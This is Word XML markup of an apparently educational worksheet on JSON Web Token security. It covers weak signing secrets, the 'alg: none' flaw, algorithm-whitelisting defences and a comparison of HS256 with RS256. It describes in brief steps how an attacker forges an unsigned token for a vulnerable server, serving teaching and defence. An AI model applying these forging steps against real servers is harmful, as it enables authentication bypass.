                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Must be at least 32 bytes (256 bits) of cryptographically random data.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Example of a BAD secret: "secret", "mysecretkey", "jwt-token-key"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Example of a GOOD secret: a randomly generated hex string like: a8f3c92e5d71b04e6a2c8f931d05e47b (generate with: openssl rand -hex 32)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Or better: switch to RS256 (asymmetric) — then there is no shared secret to steal at all.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 4 — The 'alg: none' Vulnerability (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Some older JWT libraries had a flaw: if the token's header said </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"alg": "none"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, the library would skip signature verification entirely. An attacker could:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a token with any payload they want</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"alg": "none"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the signature entirely (or leave it empty)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Send to a vulnerable server — it accepts without checking!</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0022" w:sz="4"/>
              <w:left w:val="single" w:color="CC0022" w:sz="24"/>
              <w:bottom w:val="single" w:color="CC0022" w:sz="4"/>
              <w:right w:val="single" w:color="CC0022" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Defence Against alg:none</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Never use JWT libraries that allow 'none' as an algorithm.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Always explicitly specify the allowed algorithm(s) in your server-side JWT verification code.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Example (Node.js): jwt.verify(token, secret, { algorithms: ['HS256'] })</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B75" w:sz="4"/>
              <w:left w:val="single" w:color="006B75" w:sz="24"/>
              <w:bottom w:val="single" w:color="006B75" w:sz="4"/>
              <w:right w:val="single" w:color="006B75" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E0F4F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006B75"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✏️  THINK ABOUT IT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">Which of the four attacks do you think is the most dangerous in a real application, and why?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Consider: which ones require a weak implementation, and which ones work even with a strong implementation?</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Most dangerous attack:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Why:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="3A0060" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced — HS256 vs RS256</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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 10 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Read both algorithm cards — blue for HS256, purple for RS256.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Look at the ASCII diagram that shows how the key flows differently in each.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">HS256 — Symmetric (One Key)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HS256 uses a single shared secret key for both signing and verification. Both the server that creates tokens and any server that verifies them must have the same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875A" w:sz="8"/>
              <w:left w:val="single" w:color="00875A" w:sz="8"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="8"/>
              <w:right w:val="single" w:color="00875A" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="08111E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="320"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="320"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  Auth Server          API Server 1        API Server 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ───────────          ────────────        ────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  SECRET KEY           SECRET KEY          SECRET KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  (signs token)   →   (verifies)      →   (verifies)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ⚠️ The secret must be SHARED with every service that needs to verify tokens.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ⚠️ If any server is compromised, the attacker has the key and can forge tokens.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6600CC"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">RS256 — Asymmetric (Key Pair)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RS256 uses a pair of mathematically linked keys: a private key (kept secret on the auth server) and a public key (shared freely with anyone who needs to verify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875A" w:sz="8"/>
              <w:left w:val="single" w:color="00875A" w:sz="8"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="8"/>
              <w:right w:val="single" w:color="00875A" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="08111E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="320"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="320"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  Auth Server            API Server 1        API Server 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ───────────            ────────────        ────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  PRIVATE KEY            PUBLIC KEY          PUBLIC KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  (signs token)    →    (verifies only) →   (verifies only)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ✅ Only ONE server ever holds the private key.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ✅ Public key can be shared freely — it cannot be used to SIGN tokens.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ✅ Even if API Server 1 is fully compromised, attacker still cannot forge tokens.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40"/>
        <w:gridCol w:w="4720"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
